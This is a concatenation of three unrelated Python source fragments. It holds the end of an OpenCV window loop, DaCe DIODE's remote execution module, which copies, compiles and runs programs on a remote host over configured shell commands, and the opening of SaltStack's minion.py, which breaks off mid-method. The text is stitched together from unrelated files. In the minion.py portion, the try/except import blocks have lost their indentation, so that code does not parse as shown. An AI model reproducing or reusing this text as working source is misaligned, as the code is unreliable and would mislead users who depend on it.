    # Show FPS (debugging aid, disabled)
    # print("FPS {}".format(1 / (time() - loop_time)))
    # loop_time = time()
    # Exit the loop on 'q'
    key = cv2.waitKey(1)
    if key == ord("q"):
        cv2.destroyAllWindows()
        print("Döngüden Çıkıldı")
        break
|
remote_execution.py
|
import os
import sys
import stat
import tempfile
import traceback
import subprocess
import dace.dtypes
from string import Template
from dace.codegen.compiler import generate_program_folder
from dace.config import Config
from dace.codegen.instrumentation.papi import PAPISettings, PAPIUtils
class Executor:
    """ Remote DaCe program execution management class for DIODE. """

    def __init__(self, perfplot, headless, sdfg_renderer, async_host=None):
        """
        :param perfplot: performance-plot object, or None to print timings as text
        :param headless: run without a UI; also the default for exit_on_error
        :param sdfg_renderer: renderer used to display performance data, or None
        :param async_host: AsyncExecutor hosting this run, or None for synchronous use
        """
        # Run counter; used to name successive perfplot series.
        self.counter = 0
        self.perfplot = perfplot
        self.headless = headless
        self.exit_on_error = self.headless
        self.rendered_graphs = sdfg_renderer
        self.running_async = async_host is not None
        self.async_host = async_host
        self._config = None
        # Optional callable that receives all output text (see show_output).
        self.output_generator = None

    def setExitOnError(self, do_exit):
        """Set whether a failing remote command terminates this process."""
        self.exit_on_error = do_exit

    def setConfig(self, config):
        """Use an explicit config object instead of the global dace Config."""
        self._config = config

    def config_get(self, *key_hierarchy):
        """Read a config value from the explicit config if set, else Config."""
        if self._config is None:
            return Config.get(*key_hierarchy)
        else:
            return self._config.get(*key_hierarchy)

    def run(self, dace_state, fail_on_nonzero=False):
        """Generate code for *dace_state*, copy it to the configured remote
        host, compile and run it there, then collect results and clean up.

        :param dace_state: DIODE DaceState holding the SDFG and program file
        :param fail_on_nonzero: if True, a nonzero remote exit code is treated
            as a failure by exec_cmd_and_show_output
        """
        dace_progname = dace_state.get_sdfg().name
        code_objects = dace_state.get_generated_code()

        # Figure out whether we should use MPI for launching
        use_mpi = False
        for code_object in code_objects:
            if code_object.target.target_name == 'mpi':
                use_mpi = True
                break

        # Check counter validity
        PAPIUtils.check_performance_counters(self)

        remote_workdir = self.config_get("execution", "general", "workdir")
        remote_dace_dir = remote_workdir + "/.dacecache/%s/" % dace_progname
        self.show_output("Executing DaCe program " + dace_progname + " on " + \
                self.config_get("execution", "general", "host") + "\n")

        try:
            if self.running_async:
                # Add information about what is being run
                self.async_host.notify("Generating remote workspace")
            tmpfolder = tempfile.mkdtemp()
            generate_program_folder(
                dace_state.get_sdfg(),
                code_objects,
                tmpfolder,
                config=self._config)
            self.create_remote_directory(remote_dace_dir)
            self.copy_folder_to_remote(tmpfolder, remote_dace_dir)

            if self.running_async:
                # Add information about what is being run
                self.async_host.notify("Compiling...")

            # call compile.py on the remote node in the copied folder
            self.remote_compile(remote_dace_dir, dace_progname)

            if self.running_async:
                # Add information about what is being run
                self.async_host.notify("Done compiling")

            # copy the input file and the .so file (with the right name)
            # to remote_dace_dir
            so_name = "lib" + dace_progname + "." + self.config_get(
                'compiler', 'library_extension')
            self.copy_file_from_remote(remote_dace_dir + "/build/" + so_name,
                                       tmpfolder + "/" + so_name)
            self.copy_file_to_remote(tmpfolder + "/" + so_name,
                                     remote_dace_dir)

            dace_file = dace_state.get_dace_tmpfile()
            if dace_file is None:
                raise ValueError("Dace file is None!")

            # copy the SDFG
            try:
                local_sdfg = tmpfolder + "/sdfg.out"
                sdfg = dace_state.get_sdfg()
                sdfg.save(local_sdfg)
                remote_sdfg = remote_workdir + "/sdfg.out"
                self.copy_file_to_remote(local_sdfg, remote_sdfg)
            except:
                # NOTE(review): bare except — a failure here is only printed,
                # and if get_sdfg() itself raised, `sdfg` stays unbound and
                # the is_papi_used(sdfg) call below raises NameError. Confirm.
                print("Could NOT save the SDFG")

            remote_dace_file = remote_workdir + "/" + os.path.basename(
                dace_file)
            self.copy_file_to_remote(dace_file, remote_dace_file)

            if self.running_async:
                # Add information about what is being run
                self.async_host.notify("All files copied to remote")

            papi = PAPIUtils.is_papi_used(sdfg)

            # We got the file there, now we can run with different
            # configurations.
            if papi:
                # PAPI instrumentation: run once per configured option set.
                multirun_num = PAPISettings.perf_multirun_num(
                    config=self._config)
                for iteration in range(multirun_num):
                    optdict, omp_thread_num = PAPIUtils.get_run_options(
                        self, iteration)

                    self.remote_exec_dace(
                        remote_workdir,
                        remote_dace_file,
                        use_mpi,
                        fail_on_nonzero,
                        omp_num_threads=omp_thread_num,
                        repetitions=dace_state.repetitions,
                        additional_options_dict=optdict)

                    if self.running_async:
                        # Add information about what is being run
                        self.async_host.notify("Done option threads=" +
                                               str(omp_thread_num))
            else:
                self.remote_exec_dace(
                    remote_workdir,
                    remote_dace_file,
                    use_mpi,
                    fail_on_nonzero,
                    repetitions=dace_state.repetitions)

            self.show_output("Execution Terminated\n")

            # Best-effort retrieval of the timing log.
            try:
                self.copy_file_from_remote(remote_workdir + "/results.log",
                                           ".")
            except:
                pass

            if papi:
                # Copy back the vectorization results
                PAPIUtils.retrieve_vectorization_report(
                    self, code_objects, remote_dace_dir)

                # Copy back the instrumentation results
                PAPIUtils.retrieve_instrumentation_results(
                    self, remote_workdir)

            if self.running_async:
                # Add information about what is being run
                self.async_host.notify("Cleaning up")

            try:
                self.remote_delete_file(remote_workdir + "/results.log")
            except:
                print(
                    "WARNING: results.log could not be transmitted (probably not created)"
                )

            self.remote_delete_file(remote_dace_file)
            self.remote_delete_dir(remote_dace_dir)

            def deferred():
                # Parse the retrieved results.log into the perfplot, then
                # remove the local copy.
                try:
                    res = self.update_performance_plot("results.log",
                                                       str(self.counter))
                    os.remove("results.log")
                except FileNotFoundError:
                    print("WARNING: results.log could not be read")

            if not self.headless or self.perfplot is None:
                if self.running_async and not self.headless:
                    # Must run on the UI thread when a UI exists.
                    self.async_host.run_sync(deferred)
                else:
                    deferred()

            if self.running_async:
                # Add information about what is being run
                self.async_host.notify("Done cleaning")

            # Update the performance data.
            if self.rendered_graphs is not None:
                self.rendered_graphs.set_memspeed_target()
                self.rendered_graphs.render_performance_data(
                    self.config_get("instrumentation", "papi_mode"))
        except Exception as e:
            print("\n\n\n")
            print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
            print("Running the program failed:")
            traceback.print_exc()
            print(
                "Inspect above output for more information about executed command sequence."
            )
            print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
            if self.headless:
                sys.exit(1)

        if self.running_async:
            self.async_host.notify("All done")
        self.counter += 1

    def update_performance_plot(self, resfile, name):
        """Parse timings from *resfile* into the perfplot (or print them when
        no perfplot is configured) and return the median time.

        :param resfile: path to a results.log produced by the remote run
        :param name: series name (the run counter as a string)
        """
        # Each result.log will give us many runs of one size and optimization.
        # We ignore everything in the result log except the timing

        # If no perfplot is set, write it to the output as text with a prefix
        if self.perfplot is None:
            import re
            with open(resfile) as f:
                data = f.read()
            p = re.compile('\s(\d+\.\d+)$', re.MULTILINE)
            times = p.findall(data)
            self.show_output("\n~#~#" + str(times))
        else:
            times = self.perfplot.parse_result_log(resfile)
            self.perfplot.add_run(name, times)
            self.perfplot.render()
        t = sorted([float(s) for s in times])
        print(t)
        # Median of the observed run times.
        return t[int(len(t) / 2)]

    def show_output(self, outstr):
        """ Displays output of any ongoing compilation or computation. """
        if self.output_generator is not None:
            # Pipe the output
            self.output_generator(outstr)
            return

        if isinstance(outstr, str):
            print(outstr, end="", flush=True)
            return
        # Raw bytes go straight to the underlying stdout buffer.
        sys.stdout.buffer.write(outstr)

    def remote_delete_file(self, delfile):
        """Delete a single file on the remote host."""
        s = Template(self.config_get("execution", "general", "execcmd"))
        cmd = s.substitute(
            host=self.config_get("execution", "general", "host"),
            command="rm " + delfile)
        self.exec_cmd_and_show_output(cmd)

    def remote_delete_dir(self, deldir):
        """Recursively delete a directory on the remote host."""
        s = Template(self.config_get("execution", "general", "execcmd"))
        cmd = s.substitute(
            host=self.config_get("execution", "general", "host"),
            command="rm -r " + deldir)
        self.exec_cmd_and_show_output(cmd)

    def delete_local_folder(self, path):
        """Remove *path* locally, pruning empty parent directories as well."""
        os.removedirs(path)

    def remote_exec_dace(self,
                         remote_workdir,
                         dace_file,
                         use_mpi=True,
                         fail_on_nonzero=False,
                         omp_num_threads=None,
                         additional_options_dict=None,
                         repetitions=None):
        """Run *dace_file* on the remote host via a generated start.sh script.

        :param remote_workdir: remote working directory containing the program
        :param dace_file: path of the Python program on the remote host
        :param use_mpi: launch through the configured mpiexec command
        :param fail_on_nonzero: treat a nonzero exit code as failure
        :param omp_num_threads: if set, exported as OMP_NUM_THREADS for the run
        :param additional_options_dict: extra env vars exported for the run
        :param repetitions: value for DACE_treps (defaults to config setting)
        """
        additional_options_dict = additional_options_dict or {}
        run = "${command} "
        if use_mpi == True:
            run = self.config_get("execution", "mpi", "mpiexec")
            nprocs = self.config_get("execution", "mpi", "num_procs")
        else:
            nprocs = 1

        repetitions = (repetitions or self.config_get("execution", "general",
                                                      "repetitions"))

        omp_num_threads_str = ""
        omp_num_threads_unset_str = ""
        perf_instrumentation_result_marker = ""
        if omp_num_threads is not None:
            omp_num_threads_str = "export OMP_NUM_THREADS=" + str(
                omp_num_threads) + "\n"
            omp_num_threads_unset_str = "unset OMP_NUM_THREADS\n"
            perf_instrumentation_result_marker = "echo '# ;%s; Running in multirun config' >> %s/instrumentation_results.txt\n" % (
                omp_num_threads_str.replace("\n", ""), remote_workdir)

        # Create string from all misc options
        miscoptstring = ""
        miscoptresetstring = ""
        for optkey, optval in additional_options_dict.items():
            miscoptstring += "export " + str(optkey) + "=" + str(optval) + "\n"
            miscoptresetstring += "unset " + str(optkey) + "\n"

        # Create a startscript which exports necessary env-vars
        start_sh = "set -x\n" + \
                   "export DACE_compiler_use_cache=1\n" + \
                   "export DACE_optimizer_interface=''\n" + \
                   "export DACE_profiling=1\n" + \
                   "export DACE_treps=" + str(repetitions) +"\n" + \
                   miscoptstring + \
                   omp_num_threads_str + \
                   "cd " + remote_workdir + "\n" + \
                   perf_instrumentation_result_marker
        s = Template(run + " ")
        cmd = s.substitute(command="python3 " + dace_file, num_procs=nprocs)
        start_sh += cmd + "\n"
        start_sh += "export RETVAL=$?\n"
        start_sh += (
            "unset DACE_compiler_use_cache\n" +
            "unset DACE_optimizer_interface\n" + "unset DACE_treps\n" +
            "unset DACE_profiling\n" + omp_num_threads_unset_str +
            miscoptresetstring +
            # TODO: separate program error and system error
            "exit $RETVAL\n")
        tempdir = tempfile.mkdtemp()
        startsh_file = os.path.join(tempdir, "start.sh")
        fh = open(startsh_file, "w")
        fh.write(start_sh)
        fh.close()

        st = os.stat(startsh_file)
        # Mark the generated script as executable for its owner.
        os.chmod(startsh_file, st.st_mode | stat.S_IEXEC)

        workdir = self.config_get("execution", "general", "workdir")

        self.copy_file_to_remote(
            startsh_file,
            self.config_get("execution", "general", "workdir") + "/start.sh")

        s = Template(self.config_get("execution", "general", "execcmd"))
        cmd = s.substitute(
            host=self.config_get("execution", "general", "host"),
            command=workdir + "/start.sh")
        self.exec_cmd_and_show_output(cmd, fail_on_nonzero)

        self.remote_delete_file(workdir + "/start.sh")

    def remote_compile(self, rem_path, dace_progname):
        """Invoke the DaCe code generator/compiler on the remote host."""
        compile_cmd = "python3 -m dace.codegen.compiler " + str(
            rem_path) + " " + dace_progname
        s = Template(self.config_get("execution", "general", "execcmd"))
        cmd = s.substitute(
            host=self.config_get("execution", "general", "host"),
            command=compile_cmd)
        self.exec_cmd_and_show_output(cmd)

    def create_remote_directory(self, path):
        """ Creates a path on a remote node.

            @note: We use `mkdir -p` for now, which is not portable.
        """
        mkdircmd = "mkdir -p " + path
        s = Template(self.config_get("execution", "general", "execcmd"))
        cmd = s.substitute(
            host=self.config_get("execution", "general", "host"),
            command=mkdircmd)
        self.exec_cmd_and_show_output(cmd)

    def copy_file_to_remote(self, src, dst):
        """Copy a local file to the remote host via the configured command."""
        s = Template(self.config_get("execution", "general", "copycmd_l2r"))
        cmd = s.substitute(
            host=self.config_get("execution", "general", "host"),
            srcfile=src,
            dstfile=dst)
        self.exec_cmd_and_show_output(cmd)

    def copy_folder_to_remote(self, src, dst):
        """Recursively copy a local folder to the remote host."""
        for root, subdirs, files in os.walk(src):
            for filename in files:
                file_path = os.path.join(root, filename)
                self.copy_file_to_remote(file_path, dst + "/" + filename)
            for subdir in subdirs:
                self.create_remote_directory(dst + "/" + str(subdir))
                self.copy_folder_to_remote(src + "/" + str(subdir),
                                           dst + "/" + str(subdir))
            # Only the first os.walk() level is consumed; deeper levels are
            # handled by the recursive calls above.
            return

    def copy_file_from_remote(self, src, dst):
        """Copy a file from the remote host to a local destination."""
        s = Template(self.config_get("execution", "general", "copycmd_r2l"))
        cmd = s.substitute(
            host=self.config_get("execution", "general", "host"),
            srcfile=src,
            dstfile=dst)
        self.exec_cmd_and_show_output(cmd)

    def exec_cmd_and_show_output(self, cmd, fail_on_nonzero=True):
        """Run *cmd* in a shell, streaming combined stdout/stderr through
        show_output.

        :raises ValueError: when the command fails and fail_on_nonzero is set
            (or exits the process when headless with exit_on_error).
        """
        self.show_output(cmd + "\n")
        p = subprocess.Popen(
            cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        while True:
            # Stream one byte at a time; read(1) returns b'' at EOF.
            out = p.stdout.read(1)
            if out == '' or out == b'':
                break
            if out != '' and out != b'':
                self.show_output(out)

        # Drain anything remaining and populate returncode.
        stdout, _ = p.communicate(timeout=60)
        self.show_output(stdout)
        if p.returncode != 0 and fail_on_nonzero:
            print("The command " + cmd + " failed (retcode " +\
                  str(p.returncode) + ")!\n")
            if self.headless and self.exit_on_error:
                os._exit(p.returncode)
            else:
                raise ValueError("The command " + cmd + " failed (retcode " + \
                                 str(p.returncode) + ")!")
import threading, queue
class AsyncExecutor:
    """ Asynchronous remote execution.

    Wraps an Executor in a worker thread fed by a message queue; UI updates
    are marshalled back to the GTK main loop.
    """

    def __init__(self, perfplot, headless, sdfg_renderer, diode):
        self.executor = Executor(perfplot, headless, sdfg_renderer, self)
        self.executor.setExitOnError(False)
        self.to_thread_message_queue = queue.Queue(128)
        self.from_thread_message_queue = queue.Queue(128)
        self.diode = diode
        self.running_thread = None
        self.autoquit = True  # This determines if a "quit"-message stops the thread

        self.sync_run_lock = threading.Lock()

    def counter_issue(self):
        """Forward a performance-counter problem to the DIODE UI."""
        self.diode.onCounterIssue()

    def run_sync(self, func):
        """Run *func* on the GTK main loop, serialized by sync_run_lock."""

        # Synchronize using a lock
        def deferred():
            with self.sync_run_lock:
                func()
            return False

        from gi.repository import GObject
        GObject.idle_add(deferred)

    def notify(self, message):
        """Show *message* in the DIODE status bar; 'All done' also queues a
        quit request for the worker thread."""
        if self.diode is None:
            return
        import time
        print("Got message " + str(message))

        def deferred():
            status_text = self.diode.builder.get_object("run_status_text")
            status_progress_bar = self.diode.builder.get_object("run_status")
            status_text.set_text(message)
            return False

        from gi.repository import GObject
        GObject.idle_add(deferred)
        if (message == "All done"):
            self.to_thread_message_queue.put("quit")
        time.sleep(0.001)  # Equivalent of `sched_yield()` for Python

    def run_async(self, dace_state, fail_on_nonzero=False):
        """Start the worker thread (unless already running) and queue a run
        of *dace_state*."""
        if self.running_thread is not None and self.running_thread.is_alive():
            print("Cannot start another thread!")
            return

        def task():
            self.run()

        self.running_thread = threading.Thread(target=task)
        self.running_thread.start()
        # BUG FIX: forward the caller's fail_on_nonzero instead of the
        # previously hard-coded False.
        self.append_run_async(dace_state, fail_on_nonzero=fail_on_nonzero)

    def append_run_async(self, dace_state, fail_on_nonzero=False):
        """Queue a run request for the worker thread."""
        self.to_thread_message_queue.put(("run", dace_state, fail_on_nonzero))

    def add_async_task(self, task):
        """Queue an arbitrary callable for execution on the worker thread."""
        self.to_thread_message_queue.put(("execute_task", self, task))

    def execute_task(self, task):
        return task()

    def callMethod(self, obj, name, *args):
        """Dispatch a queued message: run a task directly, or call the named
        method of *obj* with the remaining arguments."""
        # Shortcut for executing a simple task
        if name == "execute_task":
            _, subargs = args
            return self.execute_task(subargs)
        return getattr(obj, name)(*args)

    def run(self):
        """Worker loop: process queued messages until told to quit."""
        while True:
            # Read a message (blocking)
            msg = self.to_thread_message_queue.get()
            if msg == "quit":
                if self.to_thread_message_queue.empty() and self.autoquit:
                    print("Quitting async execution")
                    break
                else:
                    # There still is some queued work.
                    continue
            if msg == "forcequit":
                break

            # Unwrap and call
            ret = self.callMethod(self.executor, *msg)
            # Put the return value (including the complete command)
            self.from_thread_message_queue.put(("retval", ret, *msg))

    def join(self, timeout=None):
        # No-op: the worker thread terminates itself via "quit" messages.
        pass
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function
import os
import re
import sys
import copy
import time
import errno
import types
import signal
import fnmatch
import hashlib
import logging
import threading
import traceback
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minion
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.exceptions import (
AuthenticationError, CommandExecutionError, CommandNotFoundError,
SaltInvocationError, SaltReqTimeoutError, SaltClientError,
SaltSystemExit, SaltSyndicMasterError
)
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
    '''
    Resolves the master_ip and master_uri options

    :param opts: minion options dict ('master', 'master_port', 'ipv6',
        'retry_dns', 'file_client', ...)
    :return: dict with 'master_ip' and 'master_uri' keys
    :raises SaltSystemExit: if the master address is invalid/unresolvable
    '''
    ret = {}
    check_dns = True
    # Masterless (local file_client) minions skip DNS resolution entirely.
    if (opts.get('file_client', 'remote') == 'local' and
            not opts.get('use_master_when_local', False)):
        check_dns = False

    if check_dns is True:
        # Because I import salt.log below I need to re-import salt.utils here
        import salt.utils
        try:
            ret['master_ip'] = \
                salt.utils.dns_check(opts['master'], True, opts['ipv6'])
        except SaltClientError:
            # Resolution failed; if retry_dns is set, keep retrying forever
            # at that interval, otherwise fall back to localhost.
            if opts['retry_dns']:
                while True:
                    import salt.log
                    msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
                           'seconds').format(opts['master'], opts['retry_dns'])
                    if salt.log.is_console_configured():
                        log.error(msg)
                    else:
                        print('WARNING: {0}'.format(msg))
                    time.sleep(opts['retry_dns'])
                    try:
                        ret['master_ip'] = salt.utils.dns_check(
                            opts['master'], True, opts['ipv6']
                        )
                        break
                    except SaltClientError:
                        pass
            else:
                ret['master_ip'] = '127.0.0.1'
        except SaltSystemExit:
            err = 'Master address: {0} could not be resolved. Invalid or unresolveable address.'.format(
                opts.get('master', 'Unknown'))
            log.error(err)
            raise SaltSystemExit(code=42, msg=err)
    else:
        ret['master_ip'] = '127.0.0.1'

    # Warn when the freshly resolved address differs from the configured one.
    if 'master_ip' in ret and 'master_ip' in opts:
        if ret['master_ip'] != opts['master_ip']:
            log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
                                                                           ret['master_ip'])
            )
    ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
                                                   port=opts['master_port'])
    return ret
def get_proc_dir(cachedir, **kwargs):
    '''
    Given the cache directory, return the directory that process data is
    stored in, creating it if it doesn't exist.

    The following optional Keyword Arguments are handled:

    mode: anything os.makedirs would accept as mode.

    uid: the uid to set; if not set, or it is None or -1, no changes are
         made. Same applies if the directory is already owned by this uid.
         Must be int. Works only on unix/unix like systems.

    gid: the gid to set; same rules as uid.
    '''
    proc_dir = os.path.join(cachedir, 'proc')

    mode_arg = kwargs.pop('mode', None)
    makedirs_kwargs = {} if mode_arg is None else {'mode': mode_arg}

    if not os.path.isdir(proc_dir):
        # proc dir is missing; create it, honoring any explicit mode
        os.makedirs(proc_dir, **makedirs_kwargs)

    dir_stat = os.stat(proc_dir)

    if makedirs_kwargs:
        # An explicit mode was requested; chmod when the on-disk permission
        # bits differ from it.
        current_mode = S_IMODE(dir_stat.st_mode)
        wanted_mode = makedirs_kwargs['mode']
        if current_mode != wanted_mode:
            os.chmod(proc_dir, (dir_stat.st_mode ^ current_mode) | wanted_mode)

    if hasattr(os, 'chown'):
        # only on unix/unix like systems
        uid = kwargs.pop('uid', -1)
        gid = kwargs.pop('gid', -1)

        # skip chown entirely when both uid and gid are -1 (no-op request)
        if (dir_stat.st_uid != uid or dir_stat.st_gid != gid) and \
                [i for i in (uid, gid) if i != -1]:
            os.chown(proc_dir, uid, gid)

    return proc_dir
def parse_args_and_kwargs(func, args, data=None):
    '''
    Wrap load_args_and_kwargs

    Deprecated alias kept for backwards compatibility: emits a deprecation
    warning and forwards all arguments to load_args_and_kwargs().
    '''
    salt.utils.warn_until(
        'Boron',
        'salt.minion.parse_args_and_kwargs() has been renamed to '
        'salt.minion.load_args_and_kwargs(). Please change this function call '
        'before the Boron release of Salt.'
    )
    return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None):
    '''
    Detect the args and kwargs that need to be passed to a function call, and
    check them against what was passed.

    func -- the callable the arguments are destined for; its argspec decides
        which keyword names are acceptable.
    data -- optional publish data; when *func* accepts ``**kwargs`` each entry
        is packed in as a ``__pub_<key>`` keyword argument.

    Returns a ``(_args, _kwargs)`` tuple. Raises ``SaltInvocationError`` when
    keyword arguments are passed that the function does not support.
    '''
    argspec = salt.utils.args.get_function_argspec(func)
    _args = []
    _kwargs = {}
    invalid_kwargs = []
    for arg in args:
        if isinstance(arg, six.string_types):
            string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False)  # pylint: disable=W0632
            if string_arg:
                # Don't append the version that was just derived from parse_cli
                # above, that would result in a 2nd call to
                # salt.utils.cli.yamlify_arg(), which could mangle the input.
                _args.append(arg)
            elif string_kwarg:
                salt.utils.warn_until(
                    'Boron',
                    'The list of function args and kwargs should be parsed '
                    'by salt.utils.args.parse_input() before calling '
                    'salt.minion.load_args_and_kwargs().'
                )
                if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
                    # Function supports **kwargs or is a positional argument to
                    # the function.
                    _kwargs.update(string_kwarg)
                else:
                    # **kwargs not in argspec and parsed argument name not in
                    # list of positional arguments. This keyword argument is
                    # invalid.
                    # Use six.iteritems() for Python 3 compatibility
                    # (dict.iteritems() does not exist on Python 3) and for
                    # consistency with the other iterations in this function.
                    for key, val in six.iteritems(string_kwarg):
                        invalid_kwargs.append('{0}={1}'.format(key, val))
            continue
        # if the arg is a dict with __kwarg__ == True, then its a kwarg
        elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
            for key, val in six.iteritems(arg):
                if argspec.keywords or key in argspec.args:
                    # Function supports **kwargs or is a positional argument to
                    # the function.
                    _kwargs[key] = val
                else:
                    # **kwargs not in argspec and parsed argument name not in
                    # list of positional arguments. This keyword argument is
                    # invalid.
                    invalid_kwargs.append('{0}={1}'.format(key, val))
            continue
        else:
            _args.append(arg)
    if invalid_kwargs:
        raise SaltInvocationError(
            'The following keyword arguments are not valid: {0}'
            .format(', '.join(invalid_kwargs))
        )
    if argspec.keywords and isinstance(data, dict):
        # this function accepts **kwargs, pack in the publish data
        for key, val in six.iteritems(data):
            _kwargs['__pub_{0}'.format(key)] = val
    return _args, _kwargs
class SMinion(object):
    '''
    Create an object that has loaded all of the minion module functions,
    grains, modules, returners etc. The SMinion allows developers to
    generate all of the salt minion functions and present them with these
    functions for general use.
    '''
    def __init__(self, opts):
        # Late setup of the opts grains, so we can log from the grains module
        opts['grains'] = salt.loader.grains(opts)
        self.opts = opts
        # Only resolve/authenticate against a master when this minion
        # actually talks to one: remote file client, or a local file client
        # with use_master_when_local enabled.
        if (self.opts.get('file_client', 'remote') == 'remote'
                or self.opts.get('use_master_when_local', False)):
            if isinstance(self.opts['master'], list):
                masters = self.opts['master']
                if self.opts['random_master'] is True:
                    shuffle(masters)
                # Try each configured master in turn; the first one that lets
                # gen_modules() succeed wins.
                for master in masters:
                    self.opts['master'] = master
                    self.opts.update(resolve_dns(opts))
                    try:
                        self.gen_modules()
                        break
                    except SaltClientError:
                        log.warning(('Attempted to authenticate with master '
                                     '{0} and failed'.format(master)))
                        continue
            else:
                if self.opts['random_master'] is True:
                    log.warning('random_master is True but there is only one master specified. Ignoring.')
                self.opts.update(resolve_dns(opts))
                self.gen_modules(initial_load=True)
        else:
            # Purely local operation: skip DNS resolution and master auth.
            self.gen_modules(initial_load=True)
    def gen_modules(self, initial_load=False):
        '''
        Load all of the modules for the minion
        '''
        # Compile pillar first so the loaders below see the final pillar data
        self.opts['pillar'] = salt.pillar.get_pillar(
            self.opts,
            self.opts['grains'],
            self.opts['id'],
            self.opts['environment']
        ).compile_pillar()
        self.utils = salt.loader.utils(self.opts)
        self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
                                                 include_errors=True)
        # TODO: remove
        self.function_errors = {}  # Keep the funcs clean
        self.returners = salt.loader.returners(self.opts, self.functions)
        self.states = salt.loader.states(self.opts, self.functions)
        self.rend = salt.loader.render(self.opts, self.functions)
        self.matcher = Matcher(self.opts, self.functions)
        # Expose a reload hook so modules can be refreshed at runtime
        self.functions['sys.reload_modules'] = self.gen_modules
class MinionBase(object):
    '''
    Shared plumbing for the minion flavours: holds the opts, sets up the
    ZMQ context/poller and the local minion event pub/pull sockets, and
    provides scheduler/beacon processing helpers.
    '''
    def __init__(self, opts):
        # opts: the minion configuration dictionary
        self.opts = opts
    def _init_context_and_poller(self):
        # A single ZMQ context and poller shared by this minion's sockets
        self.context = zmq.Context()
        self.poller = zmq.Poller()
    def _prepare_minion_event_system(self):
        # Prepare the minion event system
        #
        # Start with the publish socket
        self._init_context_and_poller()
        # Hash the minion id so the ipc file name stays short and free of
        # characters that are not valid in a path.
        hash_type = getattr(hashlib, self.opts.get('hash_type', 'md5'))
        # Only use the first 10 chars to keep longer hashes from exceeding the
        # max socket path length.
        id_hash = hash_type(self.opts['id']).hexdigest()[:10]
        epub_sock_path = os.path.join(
            self.opts['sock_dir'],
            'minion_event_{0}_pub.ipc'.format(id_hash)
        )
        # Remove stale socket files left behind by a previous run
        if os.path.exists(epub_sock_path):
            os.unlink(epub_sock_path)
        epull_sock_path = os.path.join(
            self.opts['sock_dir'],
            'minion_event_{0}_pull.ipc'.format(id_hash)
        )
        if os.path.exists(epull_sock_path):
            os.unlink(epull_sock_path)
        self.epub_sock = self.context.socket(zmq.PUB)
        # ipc_mode == 'tcp' swaps the unix sockets for localhost TCP ports
        if self.opts.get('ipc_mode', '') == 'tcp':
            epub_uri = 'tcp://127.0.0.1:{0}'.format(
                self.opts['tcp_pub_port']
            )
            epull_uri = 'tcp://127.0.0.1:{0}'.format(
                self.opts['tcp_pull_port']
            )
        else:
            epub_uri = 'ipc://{0}'.format(epub_sock_path)
            salt.utils.zeromq.check_ipc_path_max_len(epub_uri)
            epull_uri = 'ipc://{0}'.format(epull_sock_path)
            salt.utils.zeromq.check_ipc_path_max_len(epull_uri)
        log.debug(
            '{0} PUB socket URI: {1}'.format(
                self.__class__.__name__, epub_uri
            )
        )
        log.debug(
            '{0} PULL socket URI: {1}'.format(
                self.__class__.__name__, epull_uri
            )
        )
        # Check to make sure the sock_dir is available, create if not
        default_minion_sock_dir = os.path.join(
            salt.syspaths.SOCK_DIR,
            'minion'
        )
        minion_sock_dir = self.opts.get('sock_dir', default_minion_sock_dir)
        if not os.path.isdir(minion_sock_dir):
            # Let's try to create the directory defined on the configuration
            # file
            try:
                os.makedirs(minion_sock_dir, 0o755)
            except OSError as exc:
                log.error('Could not create SOCK_DIR: {0}'.format(exc))
                # Let's not fail yet and try using the default path
                if minion_sock_dir == default_minion_sock_dir:
                    # We're already trying the default system path, stop now!
                    raise
                if not os.path.isdir(default_minion_sock_dir):
                    try:
                        os.makedirs(default_minion_sock_dir, 0o755)
                    except OSError as exc:
                        log.error('Could not create SOCK_DIR: {0}'.format(exc))
                        # Let's stop at this stage
                        raise
        # Create the pull socket
        self.epull_sock = self.context.socket(zmq.PULL)
        # Securely bind the event sockets: for unix sockets, tighten the
        # umask so the ipc files are created without group/other access.
        if self.opts.get('ipc_mode', '') != 'tcp':
            old_umask = os.umask(0o177)
        try:
            log.info('Starting pub socket on {0}'.format(epub_uri))
            self.epub_sock.bind(epub_uri)
            log.info('Starting pull socket on {0}'.format(epull_uri))
            self.epull_sock.bind(epull_uri)
        finally:
            # Always restore the process umask, even if bind() raised
            if self.opts.get('ipc_mode', '') != 'tcp':
                os.umask(old_umask)
    @staticmethod
    def process_schedule(minion, loop_interval):
        # Run any pending scheduled jobs for *minion*; the scheduler may
